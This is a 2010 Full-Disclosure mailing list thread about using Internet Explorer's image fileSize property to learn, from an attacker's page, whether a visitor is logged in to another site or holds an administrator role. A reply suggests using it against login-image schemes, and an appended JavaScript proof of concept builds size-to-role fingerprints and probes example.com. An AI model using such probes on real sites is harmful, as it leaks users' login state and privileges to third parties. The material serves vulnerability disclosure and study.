It could be used as a technique for defeating the login images used as "two-factor authentication" by some online services. The application of using file size to fingerprint an image is somewhat novel. This is a decidedly 'old' vector, though.
-Travis

2010/4/21 Владимир Воронцов <[email protected]>:
> Hello Full Disclosure!
>
> Once again continuing the hijacking theme, I have found a fun way to
> get at least some information about the target resource while the
> user is on the attacker's page.
>
> The already well-worn <img> tag opens new possibilities via the
> fileSize property described here:
> http://msdn.microsoft.com/en-us/library/ms533752(v=VS.85).aspx
>
> Consider a simple example: after authentication, a web application
> serves some kind of picture to the user, for example:
>
> http://example.com/getImage.php?image=myAvatar
>
> Knowing this, the attacker can create a page containing:
>
> <img id="onsec" src="http://example.com/getImage.php?image=myAvatar">
>
> <input type="button" onclick="if (onsec.fileSize > 0) { alert('authorized on example.com') } else { alert('not authorized on example.com') }">
>
> Thus, in the simplest case, the attacker learns whether the target
> user has access to example.com.
>
> Continuing the theme, I want to note that in some cases additional
> information can be obtained from the picture's size values themselves.
> It can be any logical information of the web application; say, the
> same script shows administrators a picture of one size and ordinary
> users a picture of another. Thus we obtain the user's rights. And so on.
>
> I would like the method to return the size not only of "valid" images
> but also of HTML pages, JSON, etc. Unfortunately, that does not work.
> There may, of course, be exceptions; I invite you to investigate.
>
> I have some thoughts on studying the vector with images in XML format,
> because HTML is often valid XML, and then...
>
> Checked on the test version of IE9, but it does not support SVG inside
> the <img> tag, only as a separate tag.
>
> Works in IE8; in Opera 10.52 it does not work. Please check in other
> browsers if it is not too difficult.
>
> Original in Russian: http://oxod.ru/?p=113
>
> --
> Best regards,
> Vladimir Vorontsov
> ONsec security expert
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
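As an added example (not code from the original post, from ONsec, or from Travis), the script below wires up the probe described in the thread for the IE-only fileSize property and extends it to the fingerprinting angle raised in the reply: a size-to-label table built from known sample images, with same-size collisions flagged because the oracle cannot tell two images of equal byte size apart. The target URL, the sample sizes and labels, and the callback shape are constructed for illustration; the property only exists in the IE versions the post mentions, so the decision logic lives in pure functions and the DOM wiring only runs in a browser.

```javascript
// Cross-site login/role oracle via the IE-only HTMLImageElement.fileSize
// property, as described in the post. Added example: the endpoint, the
// sample sizes and the labels are constructed, not measured.

// Build a size -> label table from known samples (label = what the
// server shows that kind of user). Two images of the same byte size
// cannot be distinguished by this oracle, so collisions are recorded
// and marked 'ambiguous' instead of silently overwriting a label.
function buildFingerprints(samples) {
  var table = {}, collisions = [];
  samples.forEach(function (s) {
    if (table[s.bytes] !== undefined && table[s.bytes] !== s.label) {
      if (collisions.indexOf(s.bytes) === -1) collisions.push(s.bytes);
      table[s.bytes] = 'ambiguous';
    } else {
      table[s.bytes] = s.label;
    }
  });
  return { table: table, collisions: collisions };
}

// Pure decision logic: turn the raw fileSize value into an inference.
// Only a decoded image yields a positive size; a missing property means
// the browser does not expose fileSize at all, and 0/-1/NaN are treated
// as "not authorized", matching the post's `fileSize > 0` check.
function inferState(fileSize, sizeToLabel) {
  if (fileSize === undefined || fileSize === null) {
    return { authorized: null, label: null, note: 'fileSize unsupported' };
  }
  var n = Number(fileSize);            // IE may hand back a string
  if (!(n > 0)) {
    return { authorized: false, label: null, note: 'no image returned' };
  }
  var label = (sizeToLabel && sizeToLabel[n]) || null;
  return {
    authorized: true,
    label: label,
    note: label ? 'size ' + n + ' matched' : 'size ' + n + ' unmatched'
  };
}

// Constructed target and samples (assumptions for the demo).
var TARGET = 'http://example.com/getImage.php?image=myAvatar';
var FINGERPRINTS = buildFingerprints([
  { label: 'admin', bytes: 4096 },
  { label: 'user',  bytes: 2048 }
]).table;

// Browser wiring: load the target image from the attacker's page and
// hand the inference to `cb`. The onerror path (target answered with a
// login page or redirect that the browser refuses to render as an
// image) is an assumption, not something the original post tested.
function probe(url, sizeToLabel, cb) {
  var img = document.createElement('img');
  img.onload = function () { cb(url, inferState(img.fileSize, sizeToLabel)); };
  img.onerror = function () { cb(url, inferState(-1, sizeToLabel)); };
  img.src = url;
  return img;
}

if (typeof document !== 'undefined') {
  probe(TARGET, FINGERPRINTS, function (u, r) {
    console.log(u, JSON.stringify(r));
  });
}
```

The collision list from buildFingerprints is the practical caveat: if the login image a site shows you is the same size as several others in its pool, the file-size fingerprint narrows the candidate set but cannot identify the image, and a size that matches nothing still leaks that some image was served to an authenticated session.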
